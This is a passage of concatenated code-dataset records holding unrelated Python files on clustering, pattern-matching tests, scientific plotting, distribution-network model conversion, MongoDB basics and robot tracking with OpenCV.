inference.n_print == 0:\n # Check inferred posterior parameters.\n mean, std = sess.run([qw.mean(), qw.std()])\n print(\"Inferred mean & std\")\n print(mean)\n print(std)\n","sub_path":"examples/bayesian_linear_regression_implicitklqp.py","file_name":"bayesian_linear_regression_implicitklqp.py","file_ext":"py","file_size_in_byte":3567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"93674655","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.spatial.distance import cityblock,euclidean\nfrom utils import refactor_and_plot\nimport copy\nimport matplotlib.cm as cm\nimport time\nimport numpy as np\nimport pandas as pd\n#from clustering import Clustering,Trajectory\n\n\n\n\ndef point_is_medoid(medoids, point):\n for e in medoids:\n if euclidean(e,point) == 0:\n return True\n return False\n\ndef display_pam_results_2D(data,nb_clusters,clusters, medoids, display_medoids = True):\n \n colors = cm.rainbow(np.linspace(0, 1, nb_clusters+1))\n\n for i,row in enumerate(data):\n c = colors[clusters[i]]\n if display_medoids and point_is_medoid(medoids, row):\n c = colors[-1]\n plt.scatter(row[0], row[1], color = c) \n\n\ndef compute_cost(medoid_indices,D,k,min_cost):\n clusters = []\n cost = 0\n for i in range(len(D)):\n distances = np.array([D[i,medoid_indices[j]] for j in range(k) ])\n \n closest_medoid_idx = distances.argmin()\n \n clusters.append(closest_medoid_idx)\n cost += distances[closest_medoid_idx]\n \n if cost > min_cost:\n return (False,cost,clusters,cost)\n return (True,cost,clusters,cost)\n\ndef pam(D, k):\n # initialization step\n former_cost = float(\"inf\")\n min_cost = float(\"inf\")\n clusters = []\n \n if k > len(D):\n print(\" number of medoids is greater than data length\")\n else:\n medoid_indices = np.random.choice(len(D),k, replace = False)\n _,new_cost,clusters,min_cost = compute_cost(medoid_indices,D,k,min_cost)\n #print(\"cost: \" + str(new_cost))\n \n while new_cost < former_cost:\n \n #display_pam_results_2D(data,clusters, data[medoid_indices],True)\n \n former_cost = new_cost\n for j in range(k):\n for i in range(len(D)):\n \n if i not in medoid_indices:\n \n med_idx = copy.copy(medoid_indices)\n med_idx[j] = i\n \n res = compute_cost(med_idx,D,k,min_cost)\n \n if res[0] == True:\n \n mod_cost,clusters,min_cost = res[1], res[2], res[3]\n \n if mod_cost < new_cost:\n \n medoid_indices = copy.copy(med_idx)\n new_cost = mod_cost\n \n #print(\"cost: \" + str(new_cost))\n \n return medoid_indices.tolist(), clusters\n\n\n","sub_path":"libs/pam.py","file_name":"pam.py","file_ext":"py","file_size_in_byte":2599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"135728492","text":"import unittest\n\nimport numpy as np\n\nfrom analyser.patterns import ExclusivePattern, FuzzyPattern\n\n\nclass CoumpoundFuzzyPatternTestCase(unittest.TestCase):\n\n def test_onehot(self):\n ep = ExclusivePattern()\n a = np.array([[3.0, 2, 3], [2, 3, 5]])\n mask = -np.inf\n m = ep.onehot_column(a, -np.inf)\n print(m)\n self.assertTrue(np.allclose(m, np.array([[3, mask, mask], [mask, 3, 5]])))\n\n def test_exclusive_find(self):\n point1 = [1, 3]\n point2 = [1, 7]\n point3 = [1, 6]\n\n fp1 = FuzzyPattern(None)\n fp1.set_embeddings(np.array([point2]))\n\n fp2 = FuzzyPattern(None)\n fp2.set_embeddings(np.array([point3]))\n\n cp = ExclusivePattern()\n cp.add_pattern(fp1)\n cp.add_pattern(fp2)\n\n text_emb = np.array([point1, point2, point3, point3, point1])\n distances_per_pattern, ranges, winning_patterns = cp.calc_exclusive_distances(text_emb)\n\n print(\"distances_per_pattern\")\n print(distances_per_pattern[0])\n print(distances_per_pattern[1])\n\n print(\"winning_patterns\")\n print(winning_patterns)\n\n print(\"ranges\")\n print(ranges)\n\n def test_eval_distances(self):\n point1 = [1, 3]\n point2 = [1, 7]\n\n embedding_point = [1, 6]\n\n # fp1 = FuzzyPattern(np.array([[point3], [point2]]))\n\n fp1 = FuzzyPattern(None)\n fp1.set_embeddings(np.array([embedding_point]))\n\n text_emb = np.array([point1, point2, embedding_point])\n sums = fp1._eval_distances(text_emb)\n print('sums=', sums)\n print('sums.shape=', sums.shape, 'len of shape=', len(sums.shape))\n self.assertEqual(1, len(sums.shape))\n self.assertEqual(len(text_emb), len(sums))\n\n line0 = sums\n # print(line0)\n # print(sums[:,1])\n\n self.assertAlmostEqual(line0[2], 0)\n\n self.assertGreater(line0[0], line0[1])\n self.assertGreater(line0[1], line0[2])\n self.assertGreater(line0[0], line0[2])\n\n def test_eval_distances_2(self):\n point1 = [1, 3]\n point2 = [1, 7]\n\n embedding_point = [1, 6]\n embedding_point2 = [1, 6.01]\n\n # fp1 = FuzzyPattern(np.array([[point3], [point2]]))\n\n pattern = FuzzyPattern(None)\n pattern.set_embeddings(np.array([embedding_point, embedding_point2]))\n\n text_emb = np.array([point1, point2, embedding_point, embedding_point, point2])\n # ----------------\n distances = pattern._eval_distances(text_emb)\n # ----------------\n print('sums=', distances)\n print('sums.shape=', distances.shape, 'len of shape=', len(distances.shape))\n self.assertEqual(1, len(distances.shape))\n self.assertEqual(len(text_emb), len(distances))\n\n self.assertAlmostEqual(distances[2], 0)\n\n self.assertGreater(distances[0], distances[1])\n self.assertGreater(distances[1], distances[2])\n self.assertGreater(distances[0], distances[2])\n\n self.assertEqual(2, np.argmin(distances))\n\n def test_eval_distances_large_pattern(self):\n point1 = [1, 3]\n point2 = [1, 7]\n\n embedding_point = [1, 6]\n embedding_point2 = [1, 6.01]\n\n # fp1 = FuzzyPattern(np.array([[point3], [point2]]))\n\n pattern = FuzzyPattern(None, _name='test pattern of len 2')\n pattern.set_embeddings(np.array([embedding_point, embedding_point2, embedding_point2, embedding_point2]))\n\n text_emb = np.array([point1, point2])\n # ----------------\n distances = pattern._eval_distances(text_emb)\n # ----------------\n print('sums=', distances)\n # print ('sums.shape=', distances.shape, 'len of shape=', len(distances.shape))\n # self.assertEqual(1, len(distances.shape))\n # self.assertEqual(len(text_emb), len(distances))\n #\n # self.assertAlmostEqual(distances[2], 0)\n #\n # self.assertGreater(distances[0], distances[1])\n # self.assertGreater(distances[1], distances[2])\n # self.assertGreater(distances[0], distances[2])\n #\n # self.assertEqual(2, np.argmin(distances))\n\n def test_etimate_confidence(self):\n from analyser.ml_tools import estimate_confidence\n confidence, sum_, nonzeros_count, _max = estimate_confidence([])\n self.assertEqual(0, confidence)\n self.assertTrue(sum_ is np.nan)\n self.assertEqual(0, nonzeros_count)\n self.assertTrue(_max is np.nan)\n\n def test_etimate_confidence2(self):\n from analyser.ml_tools import estimate_confidence\n confidence, sum_, nonzeros_count, _max = estimate_confidence([1])\n self.assertEqual(1, confidence)\n self.assertEqual(sum_, 1)\n self.assertEqual(1, nonzeros_count)\n self.assertEqual(_max, 1)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_patterns.py","file_name":"test_patterns.py","file_ext":"py","file_size_in_byte":4449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"426965995","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math\n\n\ndef plot_esm1(filename, titlename=''):\n esm1 = np.loadtxt(filename, comments='#')\n\n fig = plt.figure(\n figsize=(6, 4), # inch\n dpi=100, # dpi\n edgecolor='black',\n linewidth='1'\n )\n\n fig.subplots_adjust(wspace=0.5, hspace=0.5)\n fig.suptitle(titlename)\n\n ax1 = fig.add_subplot(221)\n ax2 = fig.add_subplot(222)\n ax3 = fig.add_subplot(223)\n ax4 = fig.add_subplot(224)\n\n ax1.set_xlabel('z (A)')\n ax1.set_ylabel('rho (e/A)')\n ax2.set_xlabel('z (A)')\n ax2.set_ylabel('V_hartree (eV)')\n ax3.set_xlabel('z (A)')\n ax3.set_ylabel('V_ion (eV)')\n ax4.set_xlabel('z (A)')\n ax4.set_ylabel('V_electrostatic (eV)')\n\n ax4.axhline(0.0, linewidth='1', linestyle='dashed', color='black')\n\n ax1.plot(esm1[:, 0], esm1[:, 1], color='black', linestyle='solid')\n ax2.plot(esm1[:, 0], esm1[:, 2], color='black', linestyle='solid')\n ax3.plot(esm1[:, 0], esm1[:, 3], color='black', linestyle='solid')\n ax4.plot(esm1[:, 0], esm1[:, 4], color='black', linestyle='solid')\n\n plt.show()\n\n\ndef plot_1drism(filename, titlename='', normalization=False, max_x=None):\n with open(filename, 'r') as file:\n data_1drism = file.readlines()\n # line_molecules = data_1drism[3].split()\n line_atoms = data_1drism[4].split()\n\n data_1drism = np.loadtxt(filename, comments='#', skiprows=5)\n\n number_of_sublines = int(math.ceil((len(line_atoms) - 1) / 3))\n number_of_subplots = len(line_atoms) - 1\n\n fig = plt.figure(\n figsize=(15, 2 * number_of_sublines), # inch\n dpi=100, # dpi\n edgecolor='black',\n linewidth='1'\n )\n\n fig.subplots_adjust(wspace=0.5, hspace=0.75)\n fig.suptitle(titlename)\n\n factor_norm = 1\n\n for n_plot in range(1, number_of_subplots + 1):\n if normalization:\n factor_norm = data_1drism[-1, n_plot]\n\n ax1 = fig.add_subplot(number_of_sublines, 3, n_plot)\n if max_x is not None:\n ax1.set_xlim([0, max_x])\n\n ax1.set_xlabel('r (A)')\n ax1.set_ylabel('rdf')\n\n if (number_of_subplots % 3) == 0:\n if n_plot <= (number_of_subplots // 3 - 1) * 3:\n ax1.set_xlabel('')\n # ax1.set_xticklabels([])\n\n ax1.set_title(line_atoms[n_plot])\n ax1.plot(data_1drism[:, 0], data_1drism[:, n_plot] / factor_norm, color='black', linestyle='solid')\n\n # plt.savefig('%s.pdf'%titlename)\n plt.show()\n\n\ndef plot_rism1(filename, titlename=''):\n with open(filename, 'r') as file:\n data_rism1 = file.readlines()\n line_data = data_rism1[1].split()\n\n data_rism1 = np.loadtxt(filename, comments='#', skiprows=2)\n\n line_data = line_data[1:]\n new_line_data = [line_data[0] + ' ' + line_data[1]]\n for i in range(2, len(line_data), 3):\n new_line_data.append(line_data[i] + ' ' + line_data[i + 1] + ' ' + line_data[i + 2])\n\n number_of_sublines = int(math.ceil((len(new_line_data) - 1) / 3))\n number_of_subplots = len(new_line_data) - 1\n\n fig = plt.figure(\n figsize=(15, 2 * number_of_sublines), # inch\n dpi=100, # dpi\n edgecolor='black',\n linewidth='1'\n )\n\n fig.subplots_adjust(wspace=0.5, hspace=0.75)\n fig.suptitle(titlename)\n\n for n_plot in range(1, number_of_subplots + 1):\n ax1 = fig.add_subplot(number_of_sublines, 3, n_plot)\n ax1.set_xlabel(new_line_data[0])\n ax1.set_ylabel(new_line_data[n_plot])\n # ax1.set_title(line_atoms[n_plot])\n ax1.plot(data_rism1[:, 0], data_rism1[:, n_plot], color='black', linestyle='solid')\n\n plt.show()\n","sub_path":"pyscript/plottools.py","file_name":"plottools.py","file_ext":"py","file_size_in_byte":3703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"39160740","text":"from __future__ import absolute_import, print_function, unicode_literals\nfrom builtins import dict, str\nimport os\nimport glob\nfrom indra import sparser\n\nbase_folder = os.path.join(os.environ['HOME'],\n 'data/darpa/phase3_eval/sources/sparser-20170330')\nsentences_folder = os.path.join(os.environ['HOME'],\n 'data/darpa/phase3_eval/sources/sparser-20170210')\n\n\ndef get_file_names(base_dir):\n fnames = glob.glob(os.path.join(base_dir, '*.xml'))\n return fnames\n\ndef get_file_stmts(fname):\n with open(fname, 'rb') as fh:\n print(fname)\n xml_bytes = fh.read()\n sp = sparser.process_xml(xml_bytes)\n if sp is None:\n print('ERROR: Could not process %s' % fname.split('/')[-1])\n print('----')\n return []\n return sp.statements\n\ndef read_stmts(folder):\n fnames = get_file_names(folder)\n all_stmts = []\n for fname in fnames:\n st = get_file_stmts(fname)\n all_stmts += st\n return all_stmts\n\nif __name__ == '__main__':\n stmts = read_stmts(base_folder)\n","sub_path":"models/phase3_eval/process_sparser.py","file_name":"process_sparser.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"363538320","text":"# uncompyle6 version 3.6.7\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: build/lib.macosx-10.13-x86_64-2.7/Cheetah/Servlet.py\n# Compiled at: 2019-09-22 10:12:27\n__doc__ = \"\\nProvides an abstract Servlet baseclass for Cheetah's Template class\\n\"\nimport os.path\n\nclass Servlet(object):\n \"\"\"\n This class is an abstract baseclass for Cheetah.Template.Template.\n \"\"\"\n transaction = None\n application = None\n request = None\n session = None\n\n def respond(self, trans=None):\n raise NotImplementedError(\"couldn't find the template's main method. If you are using #extends\\nwithout #implements, try adding '#implements respond' to your template\\ndefinition.\")\n\n def sleep(self, transaction):\n super(Servlet, self).sleep(transaction)\n self.session = None\n self.request = None\n self._request = None\n self.response = None\n self.transaction = None\n return\n\n def shutdown(self):\n pass\n\n def serverSidePath(self, path=None, normpath=os.path.normpath, abspath=os.path.abspath):\n if path:\n return normpath(abspath(path.replace('\\\\', '/')))\n else:\n if hasattr(self, '_filePath') and self._filePath:\n return normpath(abspath(self._filePath))\n else:\n return\n\n return","sub_path":"pycfiles/cheetah_lint-1.1.0-py2.py3-none-any/Servlet.py","file_name":"Servlet.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"190449397","text":"# Given an array of nums, return how many of them contain even number of digits \n\n\ndef even_digits(nums):\n count = 0 \n for num in nums:\n if len(str(num)) % 2 == 0:\n count +=1 \n return count\n\n\n# print(even_digits([12,345,2,6,7896])) # 2\n# print(even_digits([555,901,482,1771])) # 1\n","sub_path":"LeetCode/Arrays101/even_digits.py","file_name":"even_digits.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"45712155","text":"from pymongo import MongoClient\nfrom urllib.parse import quote_plus\n\n\n\nuri = \"mongodb://localhost:27017\"\nclient = MongoClient(uri)\n\ndb = client.test_database\ndb = client['test-database']\ncollection = db.test_collection\ncollection = db['test-collection']\n\npost = {\n \"author\": \"Don John\",\n \"text\": \"First post on this container\",\n \"tags\": [\"mongodb\", \"python\", \"pymongo\"]\n}\n\nposts = db.posts\n\npost_id = posts.insert_one(post).inserted_id\n\nprint(\"Post added with ID:\", post_id)\n\ntables = db.list_collection_names()\n\nprint(tables)\n","sub_path":"app/api/commun/mongo_handler.py","file_name":"mongo_handler.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"621372559","text":"import sys\nimport logging\nimport os\n\nlogger = logging.getLogger(__name__)\n\nfrom layerstack.args import ArgMode\nfrom layerstack.layer import Layer\nfrom layerstack.stack import Stack\n#from .helpers import layer_library_dir, stack_library_dir, placement_library_dir\nlayer_library_dir = '../layer_library'\nstack_library_dir = '../stack_library'\nplacement_library_dir = '../placement_library'\n\ndef create_rnm_to_cyme_stack_pv(dataset_dir, region, pct_pv=15):\n '''Create the stack to convert RNM models in OpenDSS to CYME.'''\n\n pct_pv = float(pct_pv)\n stack = Stack(name='RNM to CYME Stack')\n\n #Parse load coordinates csv file\n stack.append(Layer(os.path.join(layer_library_dir,'csv_processing')))\n\n #Parse Capacitor coordinates csv file\n stack.append(Layer(os.path.join(layer_library_dir,'csv_processing')))\n\n #Read the OpenDSS input model\n stack.append(Layer(os.path.join(layer_library_dir,'from_opendss')))\n\n #Add regulators with setpoints\n stack.append(Layer(os.path.join(layer_library_dir,'add_rnm_regulators')))\n\n #Modify the model\n stack.append(Layer(os.path.join(layer_library_dir,'post-processing')))\n\n #Add the load coordinates with a model merge\n stack.append(Layer(os.path.join(layer_library_dir,'merging-layer')))\n\n #Add the capacitor coordinates with a model merge\n stack.append(Layer(os.path.join(layer_library_dir,'merging-layer')))\n\n #Set number of customers\n stack.append(Layer(os.path.join(layer_library_dir,'set_num_customers')))\n\n #Split the network into feeders\n stack.append(Layer(os.path.join(layer_library_dir,'network_split')))\n\n #Add intermediate node coordinates\n stack.append(Layer(os.path.join(layer_library_dir,'intermediate_node')))\n\n #Create placement for PV\n stack.append(Layer(os.path.join(layer_library_dir,'create_placement')))\n\n #Add PV\n stack.append(Layer(os.path.join(layer_library_dir,'add_pv')))\n\n #Find missing coordinates\n stack.append(Layer(os.path.join(layer_library_dir,'find_missing_coords')))\n\n #Adjust overlaid nodes\n stack.append(Layer(os.path.join(layer_library_dir,'move_overlayed_nodes')))\n\n #Add cyme substations\n stack.append(Layer(os.path.join(layer_library_dir,'add_cyme_substations')))\n\n #Add ltc control settings\n stack.append(Layer(os.path.join(layer_library_dir,'set_ltc_controls')))\n\n #Add fuse control settings\n stack.append(Layer(os.path.join(layer_library_dir,'set_fuse_controls')))\n\n #Add extra switches to long lines \n stack.append(Layer(os.path.join(layer_library_dir,'add_switches_to_long_lines')))\n\n #Write to CYME\n stack.append(Layer(os.path.join(layer_library_dir,'to_cyme')))\n\n #Copy Tag file over\n stack.append(Layer(os.path.join(layer_library_dir,'add_tags')))\n\n\n for layer in stack:\n layer.args.mode = ArgMode.USE\n layer.kwargs.mode = ArgMode.USE\n\n #Load coordinate layer\n load_coordinates = stack[0]\n load_coordinates.kwargs['input_filename'] = os.path.join(dataset_dir,region,'IntermediateFormat','Loads_IntermediateFormat.csv')\n load_coordinates.kwargs['output_filename'] = os.path.join(dataset_dir,region,'IntermediateFormat','Loads_IntermediateFormat2.csv')\n load_coordinates.kwargs['object_name'] = 'Load'\n\n #Capacitor coordinate layer\n capacitor_coordinates = stack[1]\n capacitor_coordinates.kwargs['input_filename'] = os.path.join(dataset_dir,region,'IntermediateFormat','Capacitors_IntermediateFormat.csv')\n capacitor_coordinates.kwargs['output_filename'] = os.path.join(dataset_dir,region,'IntermediateFormat','Capacitors_IntermediateFormat2.csv')\n capacitor_coordinates.kwargs['object_name'] = 'Capacitor'\n\n #Read OpenDSS layer\n from_opendss = stack[2]\n from_opendss.args[0] = os.path.join(region,'OpenDSS','Master.dss')\n from_opendss.args[1] = os.path.join(region,'OpenDSS','BusCoord.dss')\n from_opendss.kwargs['base_dir'] = dataset_dir\n\n #Set regulators with setpoints\n rnm_regulators = stack[3]\n rnm_regulators.kwargs['rnm_name'] = 'CRegulador'\n rnm_regulators.kwargs['setpoint'] = 103\n\n #Modify layer\n #No input except the model. Nothing to do here...\n post_processing = stack[4]\n post_processing.kwargs['path_to_feeder_file'] = os.path.join(dataset_dir,region,'Auxiliary','Feeder.txt')\n post_processing.kwargs['path_to_switching_devices_file'] = os.path.join(dataset_dir,region,'OpenDSS','SwitchingDevices.dss')\n post_processing.kwargs['center_tap_postprocess'] = True\n post_processing.kwargs['switch_to_recloser'] = True\n\n #Merging Load layer\n merging_load = stack[5]\n merging_load.kwargs['filename'] = os.path.join(dataset_dir,region,'IntermediateFormat','Loads_IntermediateFormat2.csv')\n\n #Merging Capacitor Layer\n merging_caps = stack[6]\n merging_caps.kwargs['filename'] = os.path.join(dataset_dir,region,'IntermediateFormat','Capacitors_IntermediateFormat2.csv')\n\n #Resetting customer number layer\n customer = stack[7]\n customer.kwargs['num_customers'] = 1\n\n #Splitting layer\n split = stack[8]\n split.kwargs['path_to_feeder_file'] = os.path.join(dataset_dir,region,'Auxiliary','Feeder.txt')\n split.kwargs['path_to_no_feeder_file'] = os.path.join(dataset_dir,region,'Auxiliary','NoFeeder.txt')\n split.kwargs['compute_metrics'] = True\n split.kwargs['compute_kva_density_with_transformers'] = True #RNM networks have LV information\n split.kwargs['excel_output'] = os.path.join('.', 'results', region, '{pct}_pv'.format(pct=pct_pv),'cyme', 'metrics.csv')\n split.kwargs['json_output'] = os.path.join('.', 'results', region, '{pct}_pv'.format(pct=pct_pv),'cyme', 'metrics.json')\n\n\n #Intermediate node layer\n inter = stack[9]\n inter.kwargs['filename'] = os.path.join(dataset_dir,region,'OpenDSS','LineCoord.txt')\n\n #Create Placement for PV\n feeders = 'all'\n equipment_type = 'ditto.models.load.Load'\n selection = ('Random',pct_pv)\n seed = 1\n placement_folder = os.path.join(placement_library_dir,region)\n file_name = feeders+'_'+equipment_type.split('.')[-1]+'_'+selection[0]+'-'+str(selection[1])+'_'+str(seed)+'.txt'\n\n\n create_placement = stack[10]\n create_placement.args[0] = feeders\n create_placement.args[1] = equipment_type\n create_placement.args[2] = selection\n create_placement.args[3] = seed\n create_placement.args[4] = placement_folder\n create_placement.args[5] = file_name\n\n add_pv = stack[11]\n add_pv.args[0] = os.path.join(placement_folder,file_name) # placement\n add_pv.args[1] = 4000 # rated power (Watts)\n add_pv.args[2] = 1.0 # power factor\n\n\n\n # Missing coords\n # No args/kwargs for this layer\n\n # Move overlayed node layer\n adjust = stack[13]\n adjust.kwargs['delta_x'] = 10\n adjust.kwargs['delta_y'] = 10\n\n #Substations\n\n add_substations = stack[14]\n readme_list = [os.path.join(dataset_dir,region,'Inputs',f) for f in os.listdir(os.path.join(dataset_dir,region,'Inputs')) if f.startswith('README')]\n readme = None\n if len(readme_list)==1:\n readme = readme_list[0]\n add_substations.args[0] = os.path.join(dataset_dir,region,'Auxiliary', 'Feeder.txt')\n add_substations.kwargs['base_dir'] = dataset_dir\n add_substations.kwargs['readme_file'] = readme\n\n \n #LTC Controls\n\n ltc_controls = stack[15]\n ltc_controls.kwargs['setpoint'] = 103\n\n #Fuse Controls\n\n fuse_controls = stack[16]\n fuse_controls.kwargs['current_rating'] = 100\n\n #Add switch in long lines\n\n switch_cut = stack[17]\n switch_cut.kwargs['cutoff_length'] = 800\n\n #Write to CYME\n final = stack[18]\n final.args[0] = os.path.join('.','results',region,'{pct}_pv'.format(pct=pct_pv),'cyme')\n\n #Write Tags\n tags = stack[19]\n tags.kwargs['output_folder'] = os.path.join('.','results',region,'{pct}_pv'.format(pct=pct_pv),'cyme')\n tags.kwargs['tag_file'] = os.path.join(dataset_dir,region,'Auxiliary','FeederStats.txt')\n\n stack.save(os.path.join(stack_library_dir,'rnm_to_cyme_stack_pv_'+region+'_'+str(pct_pv)+'_pct.json'))\n\n\ndef main():\n # Based on the structure in the dataset3 repo: https://github.com/Smart-DS/dataset3\n#create_rnm_to_cyme_stack(os.path.join '..','..','dataset3', 'MixedHumid'), 'industrial')\n region= sys.argv[1]\n dataset = sys.argv[2]\n percent = float(sys.argv[3])\n dataset_map = {'dataset_4':'20180920','dataset_3':'20181010','dataset_2':'20180716'}\n if not os.path.isdir(os.path.join('.','results',region,'{pct}_pv'.format(pct=percent),'cyme')):\n os.makedirs(os.path.join('.','results',region,'{pct}_pv'.format(pct=percent),'cyme'))\n create_rnm_to_cyme_stack_pv(os.path.join('..','..','{dset}_{date}'.format(dset=dataset,date = dataset_map[dataset])), region, percent)\n from layerstack.stack import Stack\n s = Stack.load('../stack_library/rnm_to_cyme_stack_pv_'+region+'_'+str(percent)+'_pct.json')\n s.run_dir = 'run_dir'\n s.run()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"bin/create_rnm_to_cyme_stack_pv_pct.py","file_name":"create_rnm_to_cyme_stack_pv_pct.py","file_ext":"py","file_size_in_byte":9004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"71184360","text":"# -*- coding:utf-8 -*-\n# @author:Marx Yang\n# @file:test.py\n# @time:2017/7/28\n\nimport random\nimport math\nimport copy\nfrom sort.InSort import *\nfrom sort.InSort import merge_sort as ms\n\ndisorder0 = []\ndisorder1 = [1]\ndisorder2 = [9, 3]\ndisorder3 = [4, 5, 6]\ndisorder11 = [3, 65, 2, 1, 5, 32, 23, 128, 0, 6, 43]\ndisorderc = ['a', 'c', 'b', '1']\ndisorders = ['wq', 'aq']\ndisordery = [(1, 2), (0, 3)]\ndisorderlong = []\n# for i in range(0,10000):disorderlong.append(random.randint(0,100000))\nprint(ms(disorder0))\nprint(ms(disorder1))\nprint(ms(disorder2))\nprint(ms(disorder3))\nprint(ms(disorder11))\nprint(ms(disorderc))\nprint(ms(disorders))\nprint(ms(disordery))\n\norder = [1,2,3,4,5,6,7]\norder1 = order[:math.ceil(len(order)/2)]\norder2 = order[math.ceil(len(order)/2):]\nprint(order1)\nprint(order2)\n\nprint(ordered_sort([1, 2, 5, 7, 8, 12, 32, 34], [2, 5, 6, 7, 9, 10, 21, 31, 41]))\nssss = order[4:]\nssss = ssss + order[:1]\ni = 23\nprint(list(str(i)))","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"555353662","text":"#Author: Daniel Reuter\r\n#Github: https://github.com/rojter-tech\r\n\r\ndef letter_presums(A):\r\n n = len(A)\r\n ASums = (n + 1)*[0]; CSums = (n + 1)*[0]\r\n GSums = (n + 1)*[0]; TSums = (n + 1)*[0]\r\n for k in range(0,n):\r\n if A[k] == \"A\":\r\n ASums[k + 1] = ASums[k] + 1\r\n else:\r\n ASums[k + 1] = ASums[k]\r\n if A[k] == \"C\":\r\n CSums[k + 1] = CSums[k] + 1\r\n else:\r\n CSums[k + 1] = CSums[k]\r\n if A[k] == \"G\":\r\n GSums[k + 1] = GSums[k] + 1\r\n else:\r\n GSums[k + 1] = GSums[k]\r\n if A[k] == \"T\":\r\n TSums[k + 1] = TSums[k] + 1\r\n else:\r\n TSums[k + 1] = TSums[k]\r\n \r\n return ASums, CSums, GSums, TSums\r\n\r\ndef slice_minimal(p, q, ASums, CSums, GSums, TSums):\r\n freq = ASums[q + 1] - ASums[p]\r\n if freq > 0:\r\n return 1\r\n freq = CSums[q + 1] - CSums[p]\r\n if freq > 0:\r\n return 2\r\n freq = GSums[q + 1] - GSums[p]\r\n if freq > 0:\r\n return 3\r\n freq = TSums[q + 1] - TSums[p]\r\n if freq > 0:\r\n return 4\r\n\r\ndef solution(S, P, Q):\r\n ASums, CSums, GSums, TSums = letter_presums(S)\r\n minimpactList = []\r\n for p, q in zip(P,Q):\r\n thismin = slice_minimal(p, q, ASums, CSums, GSums, TSums)\r\n minimpactList.append(thismin)\r\n \r\n return minimpactList\r\n\r\nS = \"CAGCCTA\" ; P = [2,5,0]; Q = [4,5,6]\r\n#S = \"T\" ; P = [0]; Q = [0]\r\n\r\nprint(solution(S,P,Q))","sub_path":"Python/Lesson05/Lesson[5-2]Five.py","file_name":"Lesson[5-2]Five.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"515483434","text":"def django_sub_dict(obj):\n #allowed_fields = obj._meta.fields # pick the list containing the requested fields\n sub_dict = {}\n for field in obj._meta.fields: # go through all the fields of the model (obj)\n if field.is_relation: # will result in true if it's a foreign key\n if getattr(obj, field.name):\n # call this function, with a new object, the model which is being referred to by the foreign key.\n sub_dict[field.name] = django_sub_dict(getattr(obj, field.name)) \n else: # not a foreign key? Just include the value (e.g., float, integer, string)\n sub_dict[field.name] = getattr(obj, field.name)\n \n return sub_dict\n","sub_path":"shop/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"407138167","text":"import sys\nimport cv2\nimport os\nimport imutils\nsys.path.append('/home/pi/GitHub/T-BOTS/Python')\nfrom collections import deque\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom TBotTools import tbt, pid, geometry\nfrom time import time\nplt.ion()\nimport bluetooth as bt\nx = []\ny = []\nx2 = []\ny2 = []\nstarttime = []\nendtime = []\nlaptime = 1000\noldlaptime = 500\n\nfolder = 'RecordedImages/'\nrecord = 0\n\n#folder = 'SpeedTest/'\nif record:\n if os.path.isdir(folder) is not True:\n os.mkdir(folder)\ntemplate = folder + '%05d.png'\nfont = cv2.FONT_HERSHEY_SIMPLEX \n\n#---------------- Setup text writing -----------------#\n# org \norg = (50, 50) \n# fontScale \nfontScale = 0.5 \n# Blue color in BGR \ncolor = (255, 0, 0)\ncolor2 = (255, 255, 255) \n# Line thickness of 2 px \nthickness = 1\ntextstr = ''\n\n\n\ntii = 0 # counter to prevent recording every frame and slowing the Pi\niii = 1\nloopcount = 0\npathindex = 0\ntimeflag = 0\npathindex = 0\nrotspeed = 200\nspeedfactor = 0.3\n\nturnspeedfactor = 0.3\nturntime = 0.005\nbendscalefactor = 10\nrdeadban = 2\ntolerance = 30\n\nfeedforward = 10\npos_pid = pid.pid(0.1,0.4,0,[-10,10],[0,40],turntime)\nangle_pid = pid.pid(0.4,2.40,0.01,[-15,15],[-60,60],turntime)\n#----------------------------------------------------------------------#\n# Set HSV Thresholds\n#\n# Artificial Lighting\n#----------------------------------------------------------------------#\n#greenLower = (36,42,228) \n#greenUpper = (74,255,255) \n \n#pinkLower = (143,70,113) \n#pinkUpper = (255,255,255) \n\n#----------------------------------------------------------------------#\n# Sunny\n#----------------------------------------------------------------------#\n\ngreenLower = (74,105,61)\t\ngreenUpper = (90,255,224)\n\npinkLower = (127,53,58) \npinkUpper = (255,255,255) \n\n#----------------------------------------------------------------------#\n\n\n#----------------------------------------------------------------------#\n# Dull\n#----------------------------------------------------------------------#\n\n#greenLower = (41,43,213)\t\n#greenUpper = (66,255,224)\n\n#pinkLower = (140,77,98) \n#pinkUpper = (255,255,255) \n\n#----------------------------------------------------------------------#\n# sets the length of the trail\npts = deque(maxlen=10)\npts2 = deque(maxlen=10)\n\npathindex = 0\nrotspeed = 